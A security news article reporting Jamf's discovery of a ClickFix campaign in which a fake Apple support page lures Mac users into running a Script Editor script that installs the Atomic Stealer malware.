Fake Apple Page Spreads Mac Malware via ClickFix
▼ Summary
– Security researchers discovered a new ClickFix-style attack that tricks Mac users via a fake webpage offering fake disk space cleanup instructions.
– This social engineering technique, which convinces victims to run malicious commands, has expanded from targeting Windows to also include macOS and Linux users.
– Attackers now use a browser method to launch Script Editor with a malicious script, bypassing newer macOS Terminal security features.
– If executed, the script secretly downloads Atomic Stealer malware, which steals passwords, financial data, and cryptocurrency information.
– Atomic Stealer is sold as a subscription to criminals and can harvest data from Keychain, browsers, and wallets.
A new social engineering campaign is targeting Mac users through a deceptive website posing as an official Apple support page. Security analysts at Jamf recently identified this threat, which uses a ClickFix-style attack to trick individuals into executing malicious scripts. The fraudulent page advertises help for users wanting to reclaim disk space on their Mac, a common concern that lends credibility to the scam.
The ClickFix technique is a form of manipulation where attackers convince victims to run harmful commands themselves, often by framing them as necessary fixes or maintenance steps. While this method initially focused on Windows systems, it has expanded to include macOS and Linux users. For years, the standard approach on Macs involved getting users to paste malicious commands directly into the Terminal application. Apple addressed this specific vector in macOS 26.4 by introducing a security feature that scans commands pasted into Terminal before execution.
In response, threat actors have adapted their strategy. They now employ a browser-triggered workflow that launches Apple’s Script Editor instead. Both Terminal and Script Editor come pre-installed on macOS, but the shift to Script Editor helps bypass newer Terminal protections. The attack unfolds in a series of steps designed to appear legitimate. A user visits the malicious site and follows its instructions, which include clicking an “Execute” button. This action triggers a prompt asking for permission to open Script Editor. Once opened, the editor is automatically populated with the attackers’ script.
Depending on the specific macOS version, the user may see an additional warning about running the script. If this warning is ignored and the script is both saved and executed, it operates covertly to download and run a variant of Atomic Stealer, also known as AMOS. This malware is a dangerous subscription product sold on criminal forums, allowing buyers to deploy it for data theft. Its capabilities are extensive, designed to harvest system information, pilfer credentials from the Keychain password management system, and extract autofill data, passwords, cookies, and credit card details from web browsers. It also targets cryptocurrency wallets and other sensitive information.
Jamf has published relevant indicators of compromise to help organizations and individuals detect this ongoing campaign. This incident underscores the evolving nature of social engineering threats, where attackers continuously modify their methods to circumvent security improvements. Users should remain skeptical of unsolicited instructions from websites, especially those prompting the execution of scripts, even if they appear to originate from trusted brands like Apple.
(Source: Help Net Security)
